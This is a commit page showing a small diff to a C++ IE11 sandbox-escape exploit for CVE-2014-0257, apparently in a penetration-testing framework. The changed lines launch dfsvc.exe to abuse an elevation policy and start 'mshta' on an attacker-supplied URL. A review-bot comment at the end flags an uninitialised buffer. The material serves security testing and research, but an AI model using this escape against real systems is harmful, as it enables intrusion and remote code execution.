
Commit c1368db

committed
Use %windir%
1 parent 75777cb commit c1368db


1 file changed

+4
-4
lines changed


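--- a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp
@@ -90,11 +90,11 @@ template<typename T> T ExecuteMethod(mscorlib::_MethodInfoPtr method, std::vecto
 return retObj;
 }
 
-bstr_t GetExploitUrl()
+bstr_t GetEnv(LPWSTR env)
 {
 WCHAR buf[MAX_ENV];
 
-GetEnvironmentVariable(L"MYURL", buf, MAX_ENV);
+GetEnvironmentVariable(env, buf, MAX_ENV);
 
 return buf;
 }
@@ -119,7 +119,7 @@ void DoDfsvcExploit()
 PROCESS_INFORMATION procInfo = { 0 };
 
 // Start dfsvc (because we can due to the ElevationPolicy)
-if (CreateProcess(L"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline,
+if (CreateProcess(GetEnv(L"windir") + L"\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline,
 nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo))
 {
 CloseHandle(procInfo.hProcess);
@@ -166,7 +166,7 @@ void DoDfsvcExploit()
 std::vector<variant_t> startArgs;
 
 startArgs.push_back(L"mshta");
-startArgs.push_back(GetExploitUrl());
+startArgs.push_back(GetEnv(L"MYURL"));
 
 ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs);
 }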
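Review bot: `GetEnv` ignores the return value of `GetEnvironmentVariable`, so when the variable is unset or its value does not fit in `MAX_ENV` characters, `buf` stays uninitialized and `return buf;` builds a `bstr_t` by reading the stack until it hits a NUL. Now that the helper takes an arbitrary name and its result feeds the path passed to `CreateProcess`, it should zero the buffer and check the length, e.g. `WCHAR buf[MAX_ENV] = { 0 };` followed by `DWORD n = GetEnvironmentVariable(env, buf, MAX_ENV); if (n == 0 || n >= MAX_ENV) return L"";`. The parameter should also be `LPCWSTR env`, since both callers pass string literals and `LPWSTR` will not accept them under strict string-literal conformance. Separately, `%windir%` comes from the process environment block, which whoever launched the process can set; `GetSystemWindowsDirectory` returns the real directory without relying on that.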
